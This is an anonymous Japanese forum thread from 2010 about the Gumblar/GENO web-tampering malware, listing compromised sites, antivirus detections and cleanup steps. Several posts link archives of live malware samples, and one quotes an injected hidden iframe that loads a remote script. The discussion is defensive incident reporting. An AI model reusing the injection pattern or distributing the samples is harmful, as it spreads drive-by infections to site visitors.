文字の読みがむずかしいこと。また、読みにくいこと
761:名無しさん@お腹いっぱい。
10/01/17 18:40:36
>>757
ちょ・・・
昨日、今日JTBのツアー漁ってたんだけど...
改ざん疑いのあるページとかkwsk
762:名無しさん@お腹いっぱい。
10/01/17 19:19:04
nortonは360の前、2005?くらいからXP以前は動作不可になってたはず
バスターはまだ9x系サポートしてんのか、フリーのは9x系もサポート対象だな
もうそろそろソフトも動かなくなってきてるはずだけど
763:名無しさん@お腹いっぱい。
10/01/17 19:33:21
2006まで2000に対応2007から
764:名無しさん@お腹いっぱい。
10/01/17 19:37:20
訂正
2006まで2000に対応 2007からXP以前のOSには対応しなくなった。
2005は98などに対応していた。
765:名無しさん@お腹いっぱい。
10/01/17 19:43:16
気のせいかもしれないが
XP以前じゃなくて2000以前じゃ・・・
まあいいや
いくないのはJTB今日見ちゃったんだが・・・・
766:名無しさん@お腹いっぱい。
10/01/17 20:02:46
JS切ってれば閲覧していても何も問題なし
有効でも万全の対策が取れていれば感染は免れる
767:名無しさん@お腹いっぱい。
10/01/17 20:05:35
>>757
>1見てURL書いてくれ
トップページとか国内旅行とか大丈夫だったけど
768:名無しさん@お腹いっぱい。
10/01/17 20:08:27
8080の本体まとめ3
URLリンク(labs-uploader.sabaitiba.com)
PASS:virus
BSODってうああああああああああああああああああ
769:名無しさん@お腹いっぱい。
10/01/17 20:13:16
とりあえずFox+NoScriptで遮断してたから大丈夫だった:
とはいえ、「JTB」となるとうっかり許可してしまう可能性も・・・。
ホワイトリストをかなり絞って、許可を控えたほうがいいような・・・・・。
770:名無しさん@お腹いっぱい。
10/01/17 20:25:58
全てのサイトに等しく感染の危険性があるから許可サイトがやられる時はやられる
FlashやReaderは仕方ないがJAVAは削除して常に最新の状態にしておくしかないだろう
771:名無しさん@お腹いっぱい。
10/01/17 20:27:13
Readerも消せるんじゃないか
772:名無しさん@お腹いっぱい。
10/01/17 20:28:12
無理でしょ
特に仕事で使う場合とか
773:名無しさん@お腹いっぱい。
10/01/17 20:43:43
JAVAって削除すると何に影響があるの?
774:名無しさん@お腹いっぱい。
10/01/17 20:54:01
何でインスコしたか考えればわかるんじゃね
775:名無しさん@お腹いっぱい。
10/01/17 20:54:35
オンライントレードのリアルタイムチャートとかはJavaで動かしているものが多い。
Javaを使うアプリも少なくないし、要不要は人それぞれ。
776:名無しさん@お腹いっぱい。
10/01/17 20:58:17
というか、Gumblarや8080系に付かれる穴があるソフトはみな不要なんて言い始めたら
Windows自体が要らないみたいな極論になるよな。
777:名無しさん@お腹いっぱい。
10/01/17 21:04:03
利便性と安全性は反比例
778:名無しさん@お腹いっぱい。
10/01/17 21:23:50
ネットにはいつどこで何が出てくるかわかんねーからもうネットすんなって極論にもなるしなw
要は日頃使ってるものにどれだけリスクがあるかを学ぶってことなんだろうけど
779:名無しさん@お腹いっぱい。
10/01/17 21:29:32
JTBってJS入れないと検索できなかった覚えがあるけど。
たまたま最近見てなかったけど、そろそろ必要になりそうだから、
本当に感染してるなら早く上げてほしい。
(と言いつつ確認しに行けないチキンでスマソ)
火狐+NSだから、未知の脆弱性が出てきたとしても>>185でFA
なんだろうけど。
780:名無しさん@お腹いっぱい。
10/01/17 21:41:50
>>775
そういうのってブラウザプラグインは要らないからシステムに影響を与えない形でJREを同梱するだけなのになぁ
781:名無しさん@お腹いっぱい。
10/01/17 21:46:13
新型GENO病毒
URLリンク(www.virustotal.com)
安全特警は完全地支持
782:名無しさん@お腹いっぱい。
10/01/17 21:56:45
>>781
P2P厨死ね
783:名無しさん@お腹いっぱい。
10/01/17 22:20:47
javaって最新の入れるだけじゃダメなの?
>>770だと古いの削除しなきゃいけないみたいだけど。
784:名無しさん@お腹いっぱい。
10/01/17 22:23:14
javaって上書き更新だと古いverのゴミが残って干渉する可能性があるような
785:名無しさん@お腹いっぱい。
10/01/17 22:27:58
同人サイトの報告は減ってきているような気がする
ポイントサイト及び日本語リードメールサイトのの広告先の報告は上昇気味
786:名無しさん@お腹いっぱい。
10/01/17 22:34:05
>>784
1年ぐらい前に最新版でも古いJavaが原因でブラウザがクラッシュする不具合があったな、今は直ってるけど
787:名無しさん@お腹いっぱい。
10/01/17 22:37:36
>>784
最初に入れたのがJRE 1.6.0_u10以降のバージョンならその心配はない。
JRE 1.6.0_u10未満のバージョンから上書きアップデートを続けているなら要確認。
詳しくは以下参照。
JRE 1.6.0_u10 でのインストールパスの変更 - 思い立ったら書く日記
URLリンク(d.hatena.ne.jp)
788:名無しさん@お腹いっぱい。
10/01/17 22:40:52
テルモの通販にトロイ様がいらっしゃる模様。
ESETで検知。
789:名無しさん@お腹いっぱい。
10/01/17 22:44:33
>>788
LGPLタイプ
これはニュースで報道される会社レベルだな
790:名無しさん@お腹いっぱい。
10/01/17 22:49:19
www●terumo●co●jp/healthcare/shopping/index.html
これ、カートがjava script無いと動作しないタイプだから
申し込んだやつは確実にru.8080へ飛ばされてる
791:名無しさん@お腹いっぱい。
10/01/17 22:57:56
peerGuardian用のリスト作ってみようかな・・・
792:名無しさん@お腹いっぱい。
10/01/17 22:59:59
>>791
あると助かる
793:名無しさん@お腹いっぱい。
10/01/17 23:07:25
ほぼ意味ないよ
そんな事で回避できたら苦労しない
794:名無しさん@お腹いっぱい。
10/01/17 23:20:46
そんなことをするよりちゃんと対策しましょう
795:名無しさん@お腹いっぱい。
10/01/17 23:22:17
毎回変わるから遮断しても無駄
796:名無しさん@お腹いっぱい。
10/01/17 23:25:58
コワイヨー
797:名無しさん@お腹いっぱい。
10/01/17 23:57:40
どこまでいってもイタチゴッコだな
798:名無しさん@お腹いっぱい。
10/01/18 00:13:35
古いjava消すにはjavaraがおすすめ。
799:名無しさん@お腹いっぱい。
10/01/18 00:23:25
例えば、こういうのって自分の持っているブログが原因の感染の場合は
どうすればいいの?
感染の事実と各メーカーからのアンチウイルスをソフトを進めるのがいいの?
それともどうにもならなくなったら最悪広げないために一刻も早くサイトを畳むべき?
800:名無しさん@お腹いっぱい。
10/01/18 00:36:28
>>799
1.webサーバーを停止する
2.パスワードを変更する
3.ファイルを置き換える
4.お詫びの告知をする
801:名無しさん@お腹いっぱい。
10/01/18 00:44:47
0. 感染しない
802:名無しさん@お腹いっぱい。
10/01/18 00:48:09
コンパネにjavaのコーヒーカップのアイコンがないんだけど入ってないと捉えてOK?
803:名無しさん@お腹いっぱい。
10/01/18 00:52:16
ここは初心者Q&Aスレになったか
804:名無しさん@お腹いっぱい。
10/01/18 01:01:33
>>803
検索して回るのがこわい
805:名無しさん@お腹いっぱい。
10/01/18 01:14:25
SunJava 5.0 Update 16なんだけど感染するの?
806:名無しさん@お腹いっぱい。
10/01/18 01:20:50
n
807:名無しさん@お腹いっぱい。
10/01/18 01:34:20
>>768
ハイ、粕です。
Cエグゼファイル
提出時刻が20:51
解析終了時刻が21:22
定義リリース時刻が0:59で検出可
検出名 Trojan.Win32.Agent.dfru
ウイルストータルでは現時点ではまだ検出が反映されず。
808:名無しさん@お腹いっぱい。
10/01/18 02:22:16
>>800
クリーンでない環境からパスワード変更してもまた盗まれないか?
809:名無しさん@お腹いっぱい。
10/01/18 02:50:14
>>805
感染する可能性が高い。
Java 5.0を指定するアプリを使っているなら最新のUpdate 22に、Java 6.0でも問題がないのなら
Update 17以上(最新はUpdate 18)に速やかに更新すべし。
810:名無しさん@お腹いっぱい。
10/01/18 02:54:21
>>808
感染したままの環境を使い続けるとかありえないだろ、常識的に考えて
811:名無しさん@お腹いっぱい。
10/01/18 03:02:31
>>808
ウイルス除去は大前提で書いたんだすまん
812:名無しさん@お腹いっぱい。
10/01/18 03:43:26
まとめ3.5
URLリンク(labs-uploader.sabaitiba.com)
PASS:virus
PDF入れ忘れていたので追加した・・・
NER(´・ω・) ス
813:名無しさん@お腹いっぱい。
10/01/18 06:57:51
814:名無しさん@お腹いっぱい。
10/01/18 08:00:05
なんか妙に亜種の出回り方、日本国内で速くねえ?
元は露助かもしれんが、今は国内にイタズラ者がいるような気がする
815:名無しさん@お腹いっぱい。
10/01/18 08:36:13
パルコール嬬恋,ゴルフのページもやられてるね
スキーは稼ぎどきだろうし,一旦閉じる気はないのかも
816:名無しさん@お腹いっぱい。
10/01/18 09:41:37
>>814
自公がインターネットを撲滅するためにやってるんだよ
817:名無しさん@お腹いっぱい。
10/01/18 09:44:56
>>768 Cexe
その後の経過VirusTotalアドレスを数本入れてあります。
URLリンク(www1.axfc.net)
PASS:今日の鉢
ナツカシス
818:名無しさん@お腹いっぱい。
10/01/18 09:59:15
>>817
8つですか
どうもで~す
819:名無しさん@お腹いっぱい。
10/01/18 10:04:53
テルモの通販はページごと無くなってるね
よっぽど慌てたのかTOPからのリンクは残ってるけど
820:名無しさん@お腹いっぱい。
10/01/18 10:17:32
テルモ製品の組み込みOSは大丈夫だろうか
821:名無しさん@お腹いっぱい。
10/01/18 10:21:10
空気の読めねえ政治厨はどこにでも現れるんだな
822:名無しさん@お腹いっぱい。
10/01/18 10:25:09
>>809
Version 6 Update 17が最新じゃないの?
823:名無しさん@お腹いっぱい。
10/01/18 10:29:53
一応18は出てるよ
824:名無しさん@お腹いっぱい。
10/01/18 10:38:36
>>818
AntiVir
Avast
AVG
GData
Kaspersky
McAfee
NOD32
TrendMicro
825:名無しさん@お腹いっぱい。
10/01/18 10:55:07
自分の作ったサイトが感染しているかどうかは、
アップロードしたファイルをローカルでスキャンすればわかりますか?
何年も前に作ったサイトを放置したままなのですが、
どうすればいいのかわかりません。
826:名無しさん@お腹いっぱい。
10/01/18 11:04:09
>>819
テルモ報告した人だけど、こういうのって対策ソフトベンダーから連絡入るの?
一応ESETには報告しといたんだけど。(といっても報告画面が出てきたから送信ボタン押しただけ)
それともここの誰かが連絡入れたりしてる?
実はこういうのに遭遇したのはじめてなんだ。
827:名無しさん@お腹いっぱい。
10/01/18 11:32:44
>>822
日本語ページが更新されてないだけ
828:名無しさん@お腹いっぱい。
10/01/18 11:58:16
EditMtuでググって窓の社のダウンロードページにIE8で行くと
Mcafeeでウイルスがブロックされるのだが
URLリンク(www.forest.impress.co.jp)
この トロイの木馬 について
検出済み: Exploit-ObscuredHtml (トロイの木馬)
場所: C:\Documents and Settings\home\Local Settings\Application Data\Google\Toolbar History\urls\00000002
これって誤検出? プニルだと無反応なのにIE8だと反応する不思議!
829:名無しさん@お腹いっぱい。
10/01/18 12:53:23
\Google\Toolbar History\urls\00000002
これ見るとGoogle Toolbarにある過去のURLに関係ありそうじゃない?
830:名無しさん@お腹いっぱい。
10/01/18 12:55:46
>>815
カスペだと↓こんなん出ました。ヒューリスティック検出じゃなくなってます
パルコール嬬恋
2010/01/18 6:17:21 検出しました: Trojan.JS.Agent.bay URLリンク(www.s-palcall.com)
2010/01/18 12:45:55 検出しました: Trojan.JS.Agent.bay URLリンク(www.palcall.co.jp)
831:名無しさん@お腹いっぱい。
10/01/18 12:57:50
嬬恋は「なかったことにする」パターンな気がするなあ
コッソリ直してお詫びも載せず、そ知らぬ顔で営業続けそう
832:名無しさん@お腹いっぱい。
10/01/18 12:59:36
ググルツールバー入れてる、若しくは前に入れてたんじゃね
ググルツールバー入れて該当ページに逝くと、ツールバーを
奨める判断の為に履歴チェックが掛かってるだけかと
833:↑ ↑ ↑ ↑
10/01/18 12:59:58
すみません
うっかり直リンしてしまいました
危険です踏まないでください
834:名無しさん@お腹いっぱい。
10/01/18 13:00:55
>>830
今はこんな感じ
URLリンク(www.virustotal.com)
835:名無しさん@お腹いっぱい。
10/01/18 13:13:42
>>834
日本ではメジャーどころのSymantec、TrendMicro、Avast、AVGあたりが
検出しないから、ガセネタと思っているのかも???
836:名無しさん@お腹いっぱい。
10/01/18 13:30:10
avast!にはメールした。他はよろしく
837:名無しさん@お腹いっぱい。
10/01/18 13:32:15
テルモは復旧してるけど告知無しだけど
通販サイトだからやばくないか
838:名無しさん@お腹いっぱい。
10/01/18 13:38:54
テルモはこのまま無かったことにするとみた
839:名無しさん@お腹いっぱい。
10/01/18 13:45:39
感染が疑われているサイトらしい
↓
URLリンク(www.team-e.co.jp)
URLリンク(imlabel.jp)
840:名無しさん@お腹いっぱい。
10/01/18 13:50:00
>839
Gumblar Checker 2にかけたけど
両方ともやられてましたよ
841:名無しさん@お腹いっぱい。
10/01/18 13:50:39
>>839
その貼り方じゃ専ブラでリンク化する
842:名無しさん@お腹いっぱい。
10/01/18 13:53:52
URLリンク(imlabel)<)●re-no●jp/ もやられてた
843:名無しさん@お腹いっぱい。
10/01/18 13:58:35
team-eは上のほうにあったスキー場と同じ
imlabelは違ってた
URLリンク(www.virustotal.com)
もうキリが無いw
844:名無しさん@お腹いっぱい。
10/01/18 14:06:37
imlabelは違うの?ティームにはメールしとく
845:名無しさん@お腹いっぱい。
10/01/18 14:07:23
違うって違うタイプのウィルスってことだろw
846:名無しさん@お腹いっぱい。
10/01/18 14:07:53
お前らはlinuxで作業してるの?
847:名無しさん@お腹いっぱい。
10/01/18 14:10:45
誤爆
848:名無しさん@お腹いっぱい。
10/01/18 14:11:25
>>843ですがteam-eとimlabelの両方とも/*LGPL*/なんだけど、その後に続く難読化した文字列が同じかどうかです
紛らわしくてすいません
849:名無しさん@お腹いっぱい。
10/01/18 14:12:20
imlabelとre-noはaguseスルーするわ
誰か電凸しろよ
850:名無しさん@お腹いっぱい。
10/01/18 14:14:39
ティームはメールしといた
851:名無しさん@お腹いっぱい。
10/01/18 14:17:48
>>843のimlabelのvirustotalの結果でカスペがスルーしてるから、aguseもスルーしてると思われ
aguseはカスペ使ってるみたいだし
852:名無しさん@お腹いっぱい。
10/01/18 14:23:10
ウイルス対策を調査しようとして
逆に被害にあうケースのほうが多そうだな ^^;
853:名無しさん@お腹いっぱい。
10/01/18 14:38:21
いきってんじゃねーよ
854:名無しさん@お腹いっぱい。
10/01/18 14:42:38
>>852
それはお前だけだ
855:名無しさん@お腹いっぱい。
10/01/18 14:42:50
imlabelはavast!にメールした。
856:名無しさん@お腹いっぱい。
10/01/18 14:43:21
>>851
カスペだと↓こんなん出ました~
ヒューリスティック検出です~
2010/01/18 14:39:57 検出しました: HEUR:Trojan-Downloader.Script.Generic URLリンク(imlabel.jp)
857:↑ ↑ ↑ ↑
10/01/18 14:45:59
また直リンやってしもた~
すみません
858:名無しさん@お腹いっぱい。
10/01/18 14:46:50
ベンダーの本音「JAPが大量に送ってきた検体・・・重複大杉」
859:名無しさん@お腹いっぱい。
10/01/18 14:47:50
>>855
これ最新だから送付して
URLリンク(labs-uploader.sabaitiba.com)
pass: virus
860:名無しさん@お腹いっぱい。
10/01/18 14:51:21
>>856
virustotalのカスペのバージョンが7.0.0.125なので、そのへんの違いなのかね
861:名無しさん@お腹いっぱい。
10/01/18 14:54:43
>>857
直リンより、名前欄に矢印でレス指定しようとしてることのほうがムカつくw
862:名無しさん@お腹いっぱい。
10/01/18 15:21:11
さっきネット(無線Lanで)を見ていたら、恥ずかしながらGumblarに引っかかってしまいました。
かかったPCはSymantecEndpointProtectionで検知したものの分析保留のまま、
Acrobat8が起動しフリーズしてしまいました。
すぐに無線親機の電源を切りましたが、ほかに2台パソコンが起動しておりましたのでそれらに広がっていないか不安です。
今現在、かかったPCはネットから切り離しフルスキャン中で、起動していた2台のPCの片方はMicrosoftのSecurityEssentialsで同様にフルスキャン中です。
ただし、フルスキャンを行っている2つのPCは2ヶ月以上セキュリティの更新を行っておりませんでした。
また、もう片方のPCにはセキュリティ対策のソフトウェアが入っていないためスキャンができません。
私、WebとFTPのサーバーも管理しておりそちらのPCはたまたま電源が入っておりませんでしたが、
何かすべき対策はありますでしょうか?ご教授お願いいたします。
863:名無しさん@お腹いっぱい。
10/01/18 15:24:16
>>862です。
因みに
URLリンク(akiba-ns)●com/
でかかりました
864:名無しさん@お腹いっぱい。
10/01/18 15:27:57
>>862
ウイルス対策入ってなくてもスキャンできるようなサイトがあるから、
「オンラインスキャン」でGoogle検索するといろいろあるはず
問題はオンラインスキャンがGumblarの検出に対応してくれているのか・・・
865:名無しさん@お腹いっぱい。
10/01/18 15:28:55
>>862
国分:「感染したらこうなるらしいけど、どう思った?」
URLリンク(www.smilebanana.com)
866:名無しさん@お腹いっぱい。
10/01/18 15:29:09
>>835
嬬恋はSymantecを使ってると聞いたことがある。
おそらくSymantecが検出しないといくらこっちが丁寧な対応で報告しても悪戯だと思ってるのかも。
867:名無しさん@お腹いっぱい。
10/01/18 15:30:41
>>859
その中に3つあったけど、1つ目はスキー場と同じでメール済
2つ目はimlabelと同じでメール済
3つ目は/*LGPL*/の後の文字列も1つ目2つ目とは違ってて
virustotalでもResult: 1/40 (2.5%)だったので、これだけavast!にメールした
URLリンク(www.virustotal.com)
ちなみに3つともru:8080だけどURLは全部違う
868:名無しさん@お腹いっぱい。
10/01/18 15:31:01
>>863
わお てんこもりw
869:名無しさん@お腹いっぱい。
10/01/18 15:32:32
>>863
そこ凄いね。新旧揃い組?
870:名無しさん@お腹いっぱい。
10/01/18 15:35:26
>>867乙。
871:名無しさん@お腹いっぱい。
10/01/18 15:42:28
ソロイブミって言うんだよ>>869
872:名無しさん@お腹いっぱい。
10/01/18 15:42:29
>>863
3つかかってるのか
重症だな
873:名無しさん@お腹いっぱい。
10/01/18 15:43:19
てかそこなんのサイト?
874:名無しさん@お腹いっぱい。
10/01/18 15:44:44
>>863に沸くのも良いが、>>862に答えてやれよw
875:名無しさん@お腹いっぱい。
10/01/18 15:46:43
>>873
秋葉原人 | 秋葉原のニュース投稿ポータルサイトだって
876:名無しさん@お腹いっぱい。
10/01/18 15:49:07
>>874
WebとFTPのサーバーも管理しており ってw
セキュリティ対策全くと言って良いほどしてねーし
踏んだPC リカバしとけ
877:名無しさん@お腹いっぱい。
10/01/18 15:51:23
862みたいな人がサーバーの管理をしていると考えるとゾッとするね
878:名無しさん@お腹いっぱい。
10/01/18 15:52:28
自称鯖管ww
879:名無しさん@お腹いっぱい。
10/01/18 15:55:51
>>875
ほー ありがと
無縁だなw
>>877
現状中小企業はそんなもんだな
でも862が管理してるサーバって・・・・
880:名無しさん@お腹いっぱい。
10/01/18 15:58:32
殆どのサーバー管理者ってそんなもんじゃないの。
中小企業じゃ専門の業者じゃなく自称パソコンに詳しい社員にろくな報酬無しで押しつけてるみたいだし。
881:名無しさん@お腹いっぱい。
10/01/18 16:00:15
p://akiba-ns●com/は連絡先が見あたらないから
直接さくらインターネットに連絡するしかないのかな
882:名無しさん@お腹いっぱい。
10/01/18 16:00:20
「とりあえず動けばいい
セキュリティ?何それ美味しいの?」
883:名無しさん@お腹いっぱい。
10/01/18 16:13:22
WordPressで生成されてるサイトっぽいけど
こういうサイトってWPのパスを奪われてテンプレに書き加えられてるのかね?
884:名無しさん@お腹いっぱい。
10/01/18 16:15:11
>>881
気がついたらしいけど残骸に/*LGPL*/
885:名無しさん@お腹いっぱい。
10/01/18 16:16:55
皆様早速のご意見ありがとうございました!!
とりあえずオンラインスキャンをいくつか試してみようかと思います。
>>865 これとは症状が全く違う症状でした。 急にAcrobatが起動してVistaがフリーズしたので。。。
>>877 >>878 >>879 その通り自称鯖管のようなもので、大学の研究用に使っているだけの大したことない自宅鯖です。
今は使っていなかったので、セーフ?だったわけですが。。。
「現状中小企業はそんなもんだな 」ってマジすか...結構無防備なのですね。
今回はいろいろ勉強になりました。ありがとうございます!!
886:名無しさん@お腹いっぱい。
10/01/18 16:17:28
>>884取り消し
重くなってただけだった。。。
887:名無しさん@お腹いっぱい。
10/01/18 16:19:08
>>885
オマエに無防備言われてもなw
888:名無しさん@お腹いっぱい。
10/01/18 16:21:05
おい、誰か>>885をなんとかしろ
889:名無しさん@お腹いっぱい。
10/01/18 16:26:06
鯖大混乱
URLリンク(dailynews.yahoo.co.jp)
890:名無しさん@お腹いっぱい。
10/01/18 16:28:43
>>816
まあ落ち着け
とりあえずキムチで食ってろ
891:名無しさん@お腹いっぱい。
10/01/18 16:30:01
>>890
オマエもsageとけ
892:名無しさん@お腹いっぱい。
10/01/18 16:32:41
あえてageる
893:名無しさん@お腹いっぱい。
10/01/18 16:41:21
>>889
これ見に行ったら歌手の浅川マキさん死去の訃報を見てしまいへこんだ・・
894:名無しさん@お腹いっぱい。
10/01/18 16:41:47
>>889
もったいない・・・
895:名無しさん@お腹いっぱい。
10/01/18 16:49:22
>>883
WPと言っても結局FTP使って設置する場合が多いんだから同じでしょ
テンプレもindex.phpだから普通に書き換えられるだろうし、大量にあるjsファイルも全部書き換えられる
896:名無しさん@お腹いっぱい。
10/01/18 17:16:27
www●canodizayn●com
「CODE1」以外にdocument.write(unescape("~が仕込まれていて
<IFRAME name="StatPage" src="URLリンク(iner)●kz/index2.php" width=5 height=5 style="display:none">
になるのだけど新手の改竄?
897:名無しさん@お腹いっぱい。
10/01/18 17:23:40
>>896
Avast!が反応したけどそういうことではなくて?
898:名無しさん@お腹いっぱい。
10/01/18 17:25:31
view-sourceで見ようとしたらFirefoxが反応した
899:名無しさん@お腹いっぱい。
10/01/18 17:27:59
>>897
Avast!が反応したのが「CODE1~」だけでなく、「document.write(unescape("~」にも
反応してるならいいのですが、「CODE1~」を新しいコードに置き換えようとして失敗
してるのかと思った次第。
900:名無しさん@お腹いっぱい。
10/01/18 17:32:09
>>898
Bingのキャッシュ
p://cc.bingj.com/cache.aspx?q=script+code1+try&d=4586565574853043&mkt=ja-JP&setlang=ja-JP&w=415a73d1,318f0160
901:名無しさん@お腹いっぱい。
10/01/18 17:32:37
operaのコンテンツブロックにru:8080を入れたらどうなるんだろ
902:名無しさん@お腹いっぱい。
10/01/18 18:14:41
で、次スレはだれが?
903:名無しさん@お腹いっぱい。
10/01/18 18:17:47
>>950
904:名無しさん@お腹いっぱい。
10/01/18 18:18:09
>>893
自分はそのレスで知ったよ……
905:名無しさん@お腹いっぱい。
10/01/18 18:20:53
>>6 の修正よろ
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
906:名無しさん@お腹いっぱい。
10/01/18 18:28:08
ksk
907:名無しさん@お腹いっぱい。
10/01/18 18:34:31
> C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
> のファイルを削除すれば復旧しますが
これはいらない
消せば直ると勘違いする
908:名無しさん@お腹いっぱい。
10/01/18 18:44:04
>>830
210.189.83.28
URLリンク(whois.jp)
f. [組織名] 株式会社キャッチボール・トゥエンティワン・インターネット・コンサルティング
o. [電話番号] 03-3237-1367
電凸
特別なツールで調査中だそうですww
909:名無しさん@お腹いっぱい。
10/01/18 18:45:19
長い会社名だな
特別なツールってなんだよw
910:名無しさん@お腹いっぱい。
10/01/18 18:46:05
ウイルスバスターだな
911:名無しさん@お腹いっぱい。
10/01/18 18:46:15
>>856
只今メンテナンス中につき、ご利用いただけません。
912:名無しさん@お腹いっぱい。
10/01/18 18:50:14
パルコールもメンテ中だ
閲覧した人間も感染するってことを知らなくてこのまま何のアナウンスも無くサイト復帰かな
913:名無しさん@お腹いっぱい。
10/01/18 18:58:16
>911
www●re-no●jp/ とか re-no●jp/imbit/ がまだ見られるね
気がついてればいいけど
914:名無しさん@お腹いっぱい。
10/01/18 18:58:40
コンサルが噛んでんのに知らないで済むのかねえ
915:名無しさん@お腹いっぱい。
10/01/18 18:59:49
電凸で通報するとかぬかしてた馬鹿が少しは後悔してるといいな
916:名無しさん@お腹いっぱい。
10/01/18 19:00:59
URLリンク(www.dan.co.uk)
URLリンク(www.dan.co.uk)
/*LGPL*/
>>912
絶賛放置中にしか見えない。。。
917:名無しさん@お腹いっぱい。
10/01/18 19:04:38
www●palcall●co●jpはメンテ中なんだが
s-palは稼働中なんだなw
918:名無しさん@お腹いっぱい。
10/01/18 19:07:54
感染を告知しない企業が告知するまでここで晒してやれよ。
919:名無しさん@お腹いっぱい。
10/01/18 19:09:48
感染させた企業がここを見てるとは思えない
920:名無しさん@お腹いっぱい。
10/01/18 19:13:01
あわわ~ 感染した~
921:名無しさん@お腹いっぱい。
10/01/18 19:16:37
>>919
見てたかもしれない。。。
スレリンク(sec板:823番)+834-835
922:名無しさん@お腹いっぱい。
10/01/18 19:28:53
oh....
923:名無しさん@お腹いっぱい。
10/01/18 19:34:46
>>922
どうした?
924:名無しさん@お腹いっぱい。
10/01/18 19:43:47
おや?
925:名無しさん@お腹いっぱい。
10/01/18 20:12:04
あら?
926:名無しさん@お腹いっぱい。
10/01/18 20:13:29
すごい初心者でもしかしたらくだらない相談かもしれんが質問していい?
927:名無しさん@お腹いっぱい。
10/01/18 20:14:29
いいよ
928:926
10/01/18 20:14:58
今日のパンチの色なに?
929:名無しさん@お腹いっぱい。
10/01/18 20:17:48
Gumblar
930:名無しさん@お腹いっぱい。
10/01/18 20:29:32
>862
URLリンク(detail.chiebukuro.yahoo.co.jp)
回答者と同じ気持ちだ
931:名無しさん@お腹いっぱい。
10/01/18 20:31:16
ワロタw
932:名無しさん@お腹いっぱい。
10/01/18 20:49:12
>>901
*.ru* これはどうかな?
まったく意味がないかも知れんがw
933:名無しさん@お腹いっぱい。
10/01/18 20:51:53
知恵袋のほうが先なんだなw
934:名無しさん@お腹いっぱい。
10/01/18 20:52:48
知恵袋のを丸々コピーした可能性があるな
935:名無しさん@お腹いっぱい。
10/01/18 21:02:57
マルチダメ!絶対!
URLリンク(i.yimg.jp)
936:名無しさん@お腹いっぱい。
10/01/18 21:10:25
おぉ。俺の回答がw
やっぱり感染した場合はリカバリが良いよね。
937:名無しさん@お腹いっぱい。
10/01/18 21:11:06
回答者も
どっかでみたことあるような
って
ワロタ
マルチはだめって言えよww
938:名無しさん@お腹いっぱい。
10/01/18 21:17:39
感染対策はしてるんだけど、自分のサーバーが感染しないか心配です。
FTPの設定を盗むのかな?
保存しないで、IDとパスワードを手打ちにすれば大丈夫ですか?
939:名無しさん@お腹いっぱい。
10/01/18 21:21:34
>>896
たぶん新手の改竄だと思われ
940:名無しさん@お腹いっぱい。
10/01/18 21:38:05
テルモホームページに関するお詫びとお知らせ
URLリンク(www.terumo.co.jp)
941:名無しさん@お腹いっぱい。
10/01/18 21:41:56
このスレの住人は何気に頑張ってるな
感心した
942:名無しさん@お腹いっぱい。
10/01/18 21:54:09
>>938
ポート監視してるんじゃね?FTPは生のIDとパスを流すから
943:名無しさん@お腹いっぱい。
10/01/18 21:58:10
>>942
個人的にはそれに加えて、FTPソフトがhtmlファイルを開く動作にフックかけてそうな気がする。
944:名無しさん@お腹いっぱい。
10/01/18 22:04:34
>>938
設定も盗むし同一ネットワーク内の通信も見てる
945:名無しさん@お腹いっぱい。
10/01/18 22:22:16
このスレで書くことじゃないのかもしれないけど、しばらく使ってなかったPCを
久しぶりに最新版にしようと、IE8でアドビ行ってリーダー9.3
946:945
10/01/18 22:23:42
ごめん切れた。
リーダー9.3をダウンロードしたところで「攻撃的なアドオンを
認めたのでIEが閉じました」とブロックされてしまった。
3回やって同じ。なんで?アドビ今大丈夫?
947:名無しさん@お腹いっぱい。
10/01/18 22:24:03
つまりFTPをSSL通して使えば若干リスクが軽減されるのか
948:名無しさん@お腹いっぱい。
10/01/18 22:35:52
次スレはどうするよ?
949:名無しさん@お腹いっぱい。
10/01/18 22:39:29 BE:1706814656-PLT(19200)
>>948
立てます?
950:名無しさん@お腹いっぱい。
10/01/18 22:48:32
>>949 お願いしますです
951:名無しさん@お腹いっぱい。
10/01/18 22:53:59 BE:1365452238-PLT(19200)
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
952:名無しさん@お腹いっぱい。
10/01/18 22:56:20 BE:853407735-PLT(19200)
>>951誤爆…
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
スレリンク(sec板)
次立てました
953:名無しさん@お腹いっぱい。
10/01/18 22:56:22
>>940
お詫び天才してくれね?
954:名無しさん@お腹いっぱい。
10/01/18 23:00:00
テルモホームページに関するお詫びとお知らせ
弊社ホームページのうち一部のサイトにおいて、第三者の不正アクセスにより改ざんされていたことが判明致しました。当該サイトに下記期間中にアクセス頂いたお客様には大変ご心配、ご迷惑をおかけいたしました。深くお詫び申し上げます。
1.対象サイト
* テルモヘルスケアショッピングサイト
(URLリンク(www.terumo.co.jp))
2.改ざんされていた期間
* 2010年1月15日(金) 15:00 ~ 2010年1月18日(月) 09:30
3.改ざんに伴う影響
* 上記期間、対象サイトにアクセスした場合は、ウィルスに感染する可能性があります。
* ウィルスに感染した場合は、意図しないサイトへ誘導される可能性があります。
4.原因となったウィルス
* ウィルスの種類 : 「Gumblar(ガンブラー)」亜種
5.感染の確認方法、駆除方法
* 下記のサイトにて感染の確認および駆除が可能です。(無料)
トレンドマイクロ社 オンラインスキャン
URLリンク(www.trendflexsecurity.jp)
6.個人情報に扱い
* ショッピングに関する個人情報は、別サイト(URLリンク(www.e-terumo.jp))で扱っているため今回の影響はございません。
955:名無しさん@お腹いっぱい。
10/01/18 23:02:48
金曜日から改ざんされてたんだな
む。
956:名無しさん@お腹いっぱい。
10/01/18 23:03:22
palcallの方は復活したが
s-palcallは依然放置か
aguseもgredもスルーするし改竄されてることに気づいてないんだろうか
957:名無しさん@お腹いっぱい。
10/01/18 23:08:26
>>954
のオンラインスキャンってちゃんと対応してるの?
958:938
10/01/18 23:08:29
当面はWebを更新しないのが一番なのか…。
959:名無しさん@お腹いっぱい。
10/01/18 23:15:47
>>952 乙
通報願い
化粧品サイト
